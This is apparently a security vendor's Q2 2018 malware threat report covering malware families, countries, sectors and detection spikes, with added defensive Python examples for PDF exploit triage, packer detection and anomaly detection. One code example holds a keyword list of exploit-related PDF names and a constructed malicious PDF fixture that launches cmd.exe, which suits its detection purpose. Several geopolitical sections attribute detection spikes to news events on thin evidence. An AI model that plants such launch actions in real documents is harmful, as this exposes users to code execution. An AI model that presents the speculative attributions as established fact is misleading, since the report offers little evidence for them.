The increase in trojan malware in the last quarter suggests that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Together, these facts point to a surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools such as PowerShell in attacks are clear evidence of this growth in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that of desktop systems, which presages new attacks and further mobile malware development. As more people use mobile devices for financial transactions (via banking and e-payment apps) and store confidential information on them (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With five offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees), analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share over a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms propagate by mailing copies of themselves, typically as attachments or links, to addresses harvested from an infected machine; many variants add secondary vectors such as software exploits and removable-drive autorun to move between victim computers.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018: Russia experienced rather frequent Email Worm challenges, Germany had the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files, such as unauthorized copies of books and films, and attackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a well-known IM Worm called Yahos, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks with the help of Yahos.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. This malware allows an attacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May

5.2.3 Trojans

Trojans take their name from the wooden horse of Greek mythology because their malicious functionality is hidden within seemingly useful or benign programs. Typically Trojans grant remote attackers the same rights and privileges as the local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.

5.2.4 Exploits

Exploits are pieces of software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare, because the vulnerabilities they target are typically patched soon after they are discovered.

In Q2 2018 the majority of exploits detected by Comodo targeted a favorite attacker vehicle: Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating systems.
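A common first step in triaging PDF exploits of the kind this section describes is a keyword scan in the style of Didier Stevens' pdfid: count the name objects that exploit documents rely on (/JavaScript, /OpenAction, /Launch and so on) and undo the #xx hex escapes attackers use to hide them from naive scanners. The following is an added Python example written for this edition, not code from the report or from Comodo; the two PDF fragments in it are constructed test inputs and the scoring weights are illustrative.

```python
"""Keyword triage of PDF files in the style of pdfid: count the name objects that
exploit documents depend on and note the hex-escape obfuscation used to hide them."""
import re

# Name objects that show up far more often in exploit PDFs than in ordinary documents.
SUSPICIOUS_NAMES = (
    "/JavaScript", "/JS",           # script execution
    "/OpenAction", "/AA",           # actions fired automatically (on open, on page events)
    "/Launch",                      # run an external program
    "/EmbeddedFile", "/RichMedia",  # dropped payloads, Flash objects
    "/ObjStm",                      # object streams, often used to hide the objects above
)

# PDF names may encode any character as #xx, e.g. /J#61vaScript == /JavaScript.
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# A name token ends at whitespace or a PDF delimiter character.
_DELIM = rb"(?=[\s/\[\]<>(){}%]|$)"


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes so obfuscated names compare equal to their plain form."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_suspicious_names(data: bytes) -> dict:
    """Return {name: occurrences} over the de-obfuscated document bytes."""
    norm = normalize_names(data)
    return {
        name: len(re.findall(re.escape(name.encode()) + _DELIM, norm))
        for name in SUSPICIOUS_NAMES
    }


def triage(data: bytes):
    """Return (score, reasons). Weights are illustrative, not a calibrated model."""
    counts = count_suspicious_names(data)
    score, reasons = 0, []
    if counts["/JavaScript"] or counts["/JS"]:
        score += 3
        reasons.append("contains JavaScript")
    if counts["/OpenAction"] or counts["/AA"]:
        score += 2
        reasons.append("an action runs automatically when the document is opened or rendered")
    if counts["/Launch"]:
        score += 3
        reasons.append("/Launch can start an external program")
    if counts["/EmbeddedFile"] or counts["/RichMedia"]:
        score += 1
        reasons.append("carries an embedded file or rich-media object")
    if counts["/ObjStm"]:
        score += 1
        reasons.append("uses object streams (content may be hidden from plain keyword scans)")
    if _HEX_ESCAPE.search(data):
        score += 2
        reasons.append("name objects use #xx hex escapes, a common obfuscation")
    if not data.lstrip().startswith(b"%PDF-"):
        score += 1
        reasons.append("missing %PDF- header (renderers still open such files)")
    return score, reasons


# Constructed sample inputs: a bare one-page document and a minimal exploit-style
# document whose /JavaScript name is hex-escaped and which also uses /Launch.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

MALICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
4 0 obj << /Type /Action /S /J#61vaScript /JS (app.alert(1)) /Next 5 0 R >> endobj
5 0 obj << /Type /Action /S /Launch /F (cmd.exe) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("malicious", MALICIOUS_PDF)):
        score, reasons = triage(doc)
        print(f"{label}: score {score}; " + ("; ".join(reasons) or "no indicators"))
```

A real sample should be scanned after decompressing FlateDecode streams as well, since the names can live inside an object stream; this scan is the cheap first pass that decides whether deeper parsing is worth the time.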

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Constructors, Packers, Email Flooders, Virtual Tools and Jokes.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that this malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing or "packing" it inside a larger, seemingly innocuous program or data stream; the hostile code can even come in the form of scripts. The packed data is accompanied by a decompression stub, or is built as a self-extracting archive, which recreates the original code in memory at run time and then executes it. Encryption may be layered on top of compression to further conceal the payload from security software.

MUPX, a modified build of the open-source Ultimate Packer for Executables (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that handles numerous executable formats across many operating systems, and its UCL decompression routine is only a few hundred bytes of code, so the unpacking stub adds very little to the packed file. Altering UPX's section names and stub is a common way of defeating the stock UPX unpacker and signatures written for unmodified UPX.
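Packer detection in practice combines two cheap checks: the section names a packer leaves behind (UPX0/UPX1 for stock UPX) and the Shannon entropy of each section, since compressed or encrypted code sits near 8 bits per byte while ordinary machine code sits well below. The following is an added Python example written for this edition, not Comodo's code: it walks the PE section table by hand and applies both checks to three constructed executables, one unpacked, one with stock UPX section names, and one with UPX-style contents but renamed sections, as a modified UPX build produces. The PE fixtures are assembled in the block and have only enough header to be parsed, not to run; the packer-name list and the 7.0-bit threshold are common heuristics, not values from the report.

```python
"""Packer triage for PE files: known packer section names plus per-section entropy."""
import math
import struct
from collections import Counter

# Section names left behind by common packers; stock UPX uses UPX0/UPX1 (plus UPX2 or .rsrc).
PACKER_SECTION_NAMES = {
    b"UPX0", b"UPX1", b"UPX2", b"UPX!", b".aspack", b".adata", b".petite",
    b"MPRESS1", b"MPRESS2", b".vmp0", b".vmp1", b".themida",
}
HIGH_ENTROPY = 7.0  # bits per byte; compressed or encrypted data approaches 8.0


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Yield (name, raw_bytes) for every entry in the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional                 # IMAGE_SECTION_HEADER[]
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        yield name.rstrip(b"\0"), pe[raw_ptr:raw_ptr + raw_size]


def packer_verdict(pe: bytes) -> dict:
    """Return {'packed': bool, 'reasons': [...], 'entropy': {section: bits}}."""
    reasons, entropy = [], {}
    for name, raw in parse_sections(pe):
        label = name.decode("latin-1")
        entropy[label] = round(shannon_entropy(raw), 2)
        if name in PACKER_SECTION_NAMES:
            reasons.append(f"known packer section name {label}")
        if entropy[label] >= HIGH_ENTROPY:
            reasons.append(f"high-entropy section {label} ({entropy[label]} bits/byte)")
    return {"packed": bool(reasons), "reasons": reasons, "entropy": entropy}


# ---- constructed fixtures (enough PE header to parse, not to execute) ----
def build_pe(sections) -> bytes:
    """Assemble a minimal PE32 container around [(name, raw_bytes), ...]."""
    size_of_optional = 0xE0
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    table_off = 0x40 + 4 + 20 + size_of_optional
    data_off = table_off + 40 * len(sections)
    table, blobs = b"", b""
    for name, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(raw), 0x1000,
                             len(raw), data_off + len(blobs), 0, 0, 0, 0, 0x60000020)
        blobs += raw
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(size_of_optional) + table + blobs


def pseudo_random_bytes(n: int, seed: int = 0x1234) -> bytes:
    """Deterministic stand-in for compressed data (LCG output, bits 16..23)."""
    out, x = bytearray(), seed
    for _ in range(n):
        x = (1103515245 * x + 12345) & 0xFFFFFFFF
        out.append((x >> 16) & 0xFF)
    return bytes(out)


CODE_LIKE = b"push ebp; mov ebp, esp; sub esp, 0x40; " * 100      # low-entropy "machine code"
UNPACKED = build_pe([(b".text", CODE_LIKE), (b".data", b"\0" * 512)])
UPX_PACKED = build_pe([(b"UPX0", b""), (b"UPX1", pseudo_random_bytes(4096)), (b".rsrc", b"\0" * 64)])
# Modified UPX: same layout and compressed contents, but the telltale names are scrubbed.
MUPX_RENAMED = build_pe([(b".text", b""), (b".code", pseudo_random_bytes(4096)), (b".rsrc", b"\0" * 64)])

if __name__ == "__main__":
    for label, sample in (("unpacked", UNPACKED), ("upx", UPX_PACKED), ("modified upx", MUPX_RENAMED)):
        print(label, packer_verdict(sample))
```

The third fixture is the point: once the UPX0/UPX1 names are gone, only the entropy check still fires, which is why signature-only unpackers miss modified UPX builds while an entropy heuristic does not.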

In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to crash it or force it offline, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files to help them avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally, this timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application category is alarming in that users often install these applications inadvertently in the course of ordinary computer and Internet activity. Examples include common adware programs and widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Software of this kind includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in just one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. Note that "Kryptik" is also a generic name that several antivirus engines apply to heavily obfuscated or packed samples, so detections under this label do not necessarily share one codebase.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.

In conclusion, first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, which these agencies immediately began to fulfill via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
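Every subsection of this chapter rests on picking a "spike" out of a daily detection series. A robust way to do that, rather than by eye, is a median/MAD z-score: days whose count exceeds the median by more than a few scaled median absolute deviations are flagged, and the fold increase over the baseline is reported alongside (the "well over ten times the usual" figure given for North Korea below is exactly that ratio). The following is an added Python example written for this edition, not Comodo's analysis code; the 30-day series is constructed and the 3.5 threshold is a common default. The detector says which days are anomalous, not why; attributing a spike to a news event, as the sections below do, is a separate analytic step.

```python
"""Flag anomalous days in a daily detection-count series with a robust (median/MAD) z-score."""
from statistics import median

MAD_SCALE = 1.4826  # scales the MAD to match the standard deviation for Gaussian noise


def robust_z_scores(counts):
    """z-scores around the median, using the median absolute deviation as spread.
    Median and MAD are barely moved by the spikes themselves, unlike mean and std dev,
    so one 9x day does not inflate the baseline it is being compared against."""
    med = median(counts)
    spread = median(abs(c - med) for c in counts) * MAD_SCALE
    if spread == 0:  # flat baseline (most days identical): fall back to mean absolute deviation
        spread = max(sum(abs(c - med) for c in counts) / len(counts), 1.0)
    return [(c - med) / spread for c in counts]


def find_spikes(dates, counts, threshold=3.5):
    """Return [(date, count, z, fold_over_median)] for days at or above the threshold."""
    med = median(counts)
    out = []
    for date, count, z in zip(dates, counts, robust_z_scores(counts)):
        if z >= threshold:
            fold = round(count / med, 1) if med else float("inf")
            out.append((date, count, round(z, 1), fold))
    return out


# Constructed daily detection counts for June 2018: a ~100/day baseline with ordinary
# noise, a huge spike on June 4 and a smaller bump on June 20.
DATES = [f"2018-06-{d:02d}" for d in range(1, 31)]
COUNTS = [102, 97, 110, 903, 95, 101, 99, 108, 94, 100, 105, 97, 103, 99, 96,
          104, 101, 98, 100, 142, 97, 103, 99, 105, 96, 102, 100, 98, 104, 101]

if __name__ == "__main__":
    for date, count, z, fold in find_spikes(DATES, COUNTS):
        print(f"{date}: {count} detections, z={z}, {fold}x the median day")
```

Raising the threshold separates the two kinds of event: at the default 3.5 both June 4 and the June 20 bump are flagged, at 20 only June 4 survives. Whatever the threshold, a flagged day still needs a second check that the jump is not a telemetry artefact (a sensor coming online, a signature update reclassifying old files) before a geopolitical explanation is considered.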

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been several reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this Virus activity in Finland revealed that it took place almost exclusively in Vantaa, in the Helsinki metropolitan area, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends that are likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks to be revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: an accelerating shift by cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and posture.


Comodo Security Solutions Inc., Șoseaua Națională 31, Iași 700237, Romania, Europe. Tel: +40 332 806 772

Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

